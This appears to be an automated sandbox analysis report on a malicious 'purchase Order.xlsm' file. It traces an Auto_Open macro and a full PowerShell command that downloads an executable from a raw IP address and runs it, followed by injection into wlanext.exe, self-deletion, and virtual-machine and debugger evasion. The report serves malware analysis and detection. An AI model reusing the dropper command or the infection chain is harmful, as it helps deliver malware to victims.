Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll C5D3FB8CC4B1BE9B9AABEEB14B7F4C12F3FCE5C8DFB0C1968C82D8B5C19B9245
Excel document contains an embedded macro which executes code when the document is opened
Source: workbook.xml Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr codeName="ThisWorkbook"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Administrator\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><workbookProtection workbookAlgorithmName="SHA-512" workbookHashValue="g6J+U4jdDrb3WMKx8jWXEvB5PUnevNCnWu18PHNvGg3ndF21lKTVsvDW13wLgH7HS9vnHDRqP928qns3kCbkxA==" workbookSaltValue="p3a4TEPalWYAjtkycguiHw==" workbookSpinCount="100000" lockStructure="1"/><bookViews><workbookView xWindow="390" yWindow="390" windowWidth="21600" windowHeight="11385" firstSheet="1" activeTab="1"/></bookViews><sheets><sheet name="i0o86z" sheetId="2" state="hidden" r:id="rId1"/><sheet name="Sheet1" sheetId="1" r:id="rId2"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">i0o86z!$E$6</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
Source: purchase Order.xlsm Virustotal: Detection: 22%
Source: purchase Order.xlsm ReversingLabs: Detection: 40%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\explorer.exe 'C:\Windows\system32\explorer.exe' C:\Users\Public\eVJOpc.exe
Source: unknown Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exe Process created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe'
Source: C:\Users\Public\eVJOpc.exe Process created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\eVJOpc.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{00931FDB-06EA-4BE4-B65D-68115E3B9413} - OProcSessId.dat
Source: qqxmvpxcvyt.dll.8.dr Binary string: LanmanWorkstationLanmanServerc:\lanmanWorkgroupHOMEAdministrators\\Default-First-Site-NameNo commenthttp://https://SSL:%uhttphttps\DavWWWRoot@SSL80443AdministratorGuest_ldap._tcp.dc._msdcs.\Device\UnknownTransport_\Device\NetBT_Tcpip_LsaQueryInformationPolicy failed with NT status %x
Source: qqxmvpxcvyt.dll.8.dr Binary string: \Device\UnknownTransport_
Source: qqxmvpxcvyt.dll.8.dr Binary string: \Device\NetBT_Tcpip_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSM@15/13@0/1
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_00402053 CoCreateInstance,MultiByteToWideChar, 8_2_00402053
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 8_2_00404292
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2976:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Windows\explorer.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: purchase Order.xlsm Initial sample: OLE zip file path = xl/media/image1.png
Source: 47E20000.0.dr Initial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: wntdll.pdbUGP source: eVJOpc.exe, 00000008.00000003.370323842.000000000F210000.00000004.00000001.sdmp, eVJOpc.exe, 00000009.00000002.452970458.0000000000B20000.00000040.00000001.sdmp, wlanext.exe, 00000013.00000002.564446547.00000000033CF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: eVJOpc.exe, wlanext.exe
Source: Binary string: wlanext.pdb source: eVJOpc.exe, 00000009.00000002.452915644.0000000000AD0000.00000040.00020000.sdmp
Source: Binary string: wlanext.pdbGCTL source: eVJOpc.exe, 00000009.00000002.452915644.0000000000AD0000.00000040.00020000.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_079427DB push ebx; ret 1_2_0794287A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0794DE80 push es; ret 1_2_0794DE90
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_0041B87C push eax; ret 9_2_0041B882
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_0041B812 push eax; ret 9_2_0041B818
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_0041B81B push eax; ret 9_2_0041B882
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_0041C9B0 push dword ptr [E4BA1D0Dh]; ret 9_2_0041C9CF
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00418B85 pushfd ; ret 9_2_00418B8A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00415F20 push ebp; iretd 9_2_00415F21
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_0041B7C5 push eax; ret 9_2_0041B818
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B9D0D1 push ecx; ret 9_2_00B9D0E4
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_0041B87C push eax; ret 9_1_0041B882
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_0041B812 push eax; ret 9_1_0041B818
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_0041B81B push eax; ret 9_1_0041B882
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_0041C9B0 push dword ptr [E4BA1D0Dh]; ret 9_1_0041C9CF
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_00418B85 pushfd ; ret 9_1_00418B8A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_00415F20 push ebp; iretd 9_1_00415F21
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_0041B7C5 push eax; ret 9_1_0041B818
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0332D0D1 push ecx; ret 19_2_0332D0E4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009CB81B push eax; ret 19_2_009CB882
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009CB812 push eax; ret 19_2_009CB818
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009CB87C push eax; ret 19_2_009CB882
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009CC9B0 push dword ptr [E4BA1D0Dh]; ret 19_2_009CC9CF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009C8B85 pushfd ; ret 19_2_009C8B8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009CB7C5 push eax; ret 19_2_009CB818
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009C5F20 push ebp; iretd 19_2_009C5F21

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\Public\eVJOpc.exe File created: C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\eVJOpc.exe
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\eVJOpc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\eVJOpc.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\eVJOpc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\eVJOpc.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\eVJOpc.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 00000000009B8614 second address: 00000000009B861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 00000000009B89AE second address: 00000000009B89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6860 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7044 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6360 Thread sleep time: -30000s >= -30000s
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_004088E0 rdtsc 9_2_004088E0
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2440
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_00405E93 FindFirstFileA,FindClose, 8_2_00405E93
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 8_2_004054BD
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_00402671 FindFirstFileA, 8_2_00402671
Source: explorer.exe, 0000000A.00000000.382413657.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.402916350.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000000A.00000000.405345542.000000000EF44000.00000004.00000001.sdmp Binary or memory string: 8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI.3
Source: explorer.exe, 0000000A.00000000.382413657.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000000A.00000000.424269138.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.560332764.000000000089A000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\
Source: powershell.exe, 00000001.00000002.357769457.0000000004B13000.00000004.00000001.sdmp Binary or memory string: ,f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: explorer.exe, 0000000A.00000000.424269138.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: powershell.exe, 00000001.00000002.365400070.00000000080D2000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 0000000A.00000000.382413657.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Anti Debugging:

Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_10007AC0 tgisdk,GetProcessHeap,RtlAllocateHeap,memset,VirtualProtect, 8_2_10007AC0
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_004088E0 rdtsc 9_2_004088E0
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_1000B40A mov eax, dword ptr fs:[00000030h] 8_2_1000B40A
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_1000B70E mov eax, dword ptr fs:[00000030h] 8_2_1000B70E
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_1000B61E mov eax, dword ptr fs:[00000030h] 8_2_1000B61E
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_1000B74C mov eax, dword ptr fs:[00000030h] 8_2_1000B74C
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_1000B6CF mov eax, dword ptr fs:[00000030h] 8_2_1000B6CF
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7F0BF mov ecx, dword ptr fs:[00000030h] 9_2_00B7F0BF
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7F0BF mov eax, dword ptr fs:[00000030h] 9_2_00B7F0BF
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7F0BF mov eax, dword ptr fs:[00000030h] 9_2_00B7F0BF
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B890AF mov eax, dword ptr fs:[00000030h] 9_2_00B890AF
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h] 9_2_00B720A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h] 9_2_00B720A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h] 9_2_00B720A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h] 9_2_00B720A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h] 9_2_00B720A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B720A0 mov eax, dword ptr fs:[00000030h] 9_2_00B720A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B49080 mov eax, dword ptr fs:[00000030h] 9_2_00B49080
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC3884 mov eax, dword ptr fs:[00000030h] 9_2_00BC3884
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC3884 mov eax, dword ptr fs:[00000030h] 9_2_00BC3884
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B440E1 mov eax, dword ptr fs:[00000030h] 9_2_00B440E1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B440E1 mov eax, dword ptr fs:[00000030h] 9_2_00B440E1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B440E1 mov eax, dword ptr fs:[00000030h] 9_2_00B440E1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B458EC mov eax, dword ptr fs:[00000030h] 9_2_00B458EC
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDB8D0 mov eax, dword ptr fs:[00000030h] 9_2_00BDB8D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDB8D0 mov ecx, dword ptr fs:[00000030h] 9_2_00BDB8D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDB8D0 mov eax, dword ptr fs:[00000030h] 9_2_00BDB8D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDB8D0 mov eax, dword ptr fs:[00000030h] 9_2_00BDB8D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDB8D0 mov eax, dword ptr fs:[00000030h] 9_2_00BDB8D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDB8D0 mov eax, dword ptr fs:[00000030h] 9_2_00BDB8D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7002D mov eax, dword ptr fs:[00000030h] 9_2_00B7002D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7002D mov eax, dword ptr fs:[00000030h] 9_2_00B7002D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7002D mov eax, dword ptr fs:[00000030h] 9_2_00B7002D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7002D mov eax, dword ptr fs:[00000030h] 9_2_00B7002D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7002D mov eax, dword ptr fs:[00000030h] 9_2_00B7002D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5B02A mov eax, dword ptr fs:[00000030h] 9_2_00B5B02A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5B02A mov eax, dword ptr fs:[00000030h] 9_2_00B5B02A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5B02A mov eax, dword ptr fs:[00000030h] 9_2_00B5B02A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5B02A mov eax, dword ptr fs:[00000030h] 9_2_00B5B02A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC7016 mov eax, dword ptr fs:[00000030h] 9_2_00BC7016
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC7016 mov eax, dword ptr fs:[00000030h] 9_2_00BC7016
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC7016 mov eax, dword ptr fs:[00000030h] 9_2_00BC7016
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C02073 mov eax, dword ptr fs:[00000030h] 9_2_00C02073
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C11074 mov eax, dword ptr fs:[00000030h] 9_2_00C11074
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C14015 mov eax, dword ptr fs:[00000030h] 9_2_00C14015
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C14015 mov eax, dword ptr fs:[00000030h] 9_2_00C14015
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B60050 mov eax, dword ptr fs:[00000030h] 9_2_00B60050
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B60050 mov eax, dword ptr fs:[00000030h] 9_2_00B60050
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC51BE mov eax, dword ptr fs:[00000030h] 9_2_00BC51BE
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC51BE mov eax, dword ptr fs:[00000030h] 9_2_00BC51BE
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC51BE mov eax, dword ptr fs:[00000030h] 9_2_00BC51BE
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC51BE mov eax, dword ptr fs:[00000030h] 9_2_00BC51BE
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B761A0 mov eax, dword ptr fs:[00000030h] 9_2_00B761A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B761A0 mov eax, dword ptr fs:[00000030h] 9_2_00B761A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC69A6 mov eax, dword ptr fs:[00000030h] 9_2_00BC69A6
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72990 mov eax, dword ptr fs:[00000030h] 9_2_00B72990
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7A185 mov eax, dword ptr fs:[00000030h] 9_2_00B7A185
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6C182 mov eax, dword ptr fs:[00000030h] 9_2_00B6C182
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4B1E1 mov eax, dword ptr fs:[00000030h] 9_2_00B4B1E1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4B1E1 mov eax, dword ptr fs:[00000030h] 9_2_00B4B1E1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4B1E1 mov eax, dword ptr fs:[00000030h] 9_2_00B4B1E1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BD41E8 mov eax, dword ptr fs:[00000030h] 9_2_00BD41E8
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C049A4 mov eax, dword ptr fs:[00000030h] 9_2_00C049A4
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C049A4 mov eax, dword ptr fs:[00000030h] 9_2_00C049A4
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C049A4 mov eax, dword ptr fs:[00000030h] 9_2_00C049A4
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C049A4 mov eax, dword ptr fs:[00000030h] 9_2_00C049A4
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7513A mov eax, dword ptr fs:[00000030h] 9_2_00B7513A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7513A mov eax, dword ptr fs:[00000030h] 9_2_00B7513A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B64120 mov eax, dword ptr fs:[00000030h] 9_2_00B64120
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B64120 mov eax, dword ptr fs:[00000030h] 9_2_00B64120
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B64120 mov eax, dword ptr fs:[00000030h] 9_2_00B64120
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B64120 mov eax, dword ptr fs:[00000030h] 9_2_00B64120
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B64120 mov ecx, dword ptr fs:[00000030h] 9_2_00B64120
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B49100 mov eax, dword ptr fs:[00000030h] 9_2_00B49100
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B49100 mov eax, dword ptr fs:[00000030h] 9_2_00B49100
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B49100 mov eax, dword ptr fs:[00000030h] 9_2_00B49100
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4B171 mov eax, dword ptr fs:[00000030h] 9_2_00B4B171
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4B171 mov eax, dword ptr fs:[00000030h] 9_2_00B4B171
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4C962 mov eax, dword ptr fs:[00000030h] 9_2_00B4C962
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6B944 mov eax, dword ptr fs:[00000030h] 9_2_00B6B944
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6B944 mov eax, dword ptr fs:[00000030h] 9_2_00B6B944
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5AAB0 mov eax, dword ptr fs:[00000030h] 9_2_00B5AAB0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5AAB0 mov eax, dword ptr fs:[00000030h] 9_2_00B5AAB0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7FAB0 mov eax, dword ptr fs:[00000030h] 9_2_00B7FAB0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B452A5 mov eax, dword ptr fs:[00000030h] 9_2_00B452A5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B452A5 mov eax, dword ptr fs:[00000030h] 9_2_00B452A5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B452A5 mov eax, dword ptr fs:[00000030h] 9_2_00B452A5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B452A5 mov eax, dword ptr fs:[00000030h] 9_2_00B452A5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B452A5 mov eax, dword ptr fs:[00000030h] 9_2_00B452A5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7D294 mov eax, dword ptr fs:[00000030h] 9_2_00B7D294
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7D294 mov eax, dword ptr fs:[00000030h] 9_2_00B7D294
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72AE4 mov eax, dword ptr fs:[00000030h] 9_2_00B72AE4
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72ACB mov eax, dword ptr fs:[00000030h] 9_2_00B72ACB
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B84A2C mov eax, dword ptr fs:[00000030h] 9_2_00B84A2C
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B84A2C mov eax, dword ptr fs:[00000030h] 9_2_00B84A2C
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0EA55 mov eax, dword ptr fs:[00000030h] 9_2_00C0EA55
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4AA16 mov eax, dword ptr fs:[00000030h] 9_2_00B4AA16
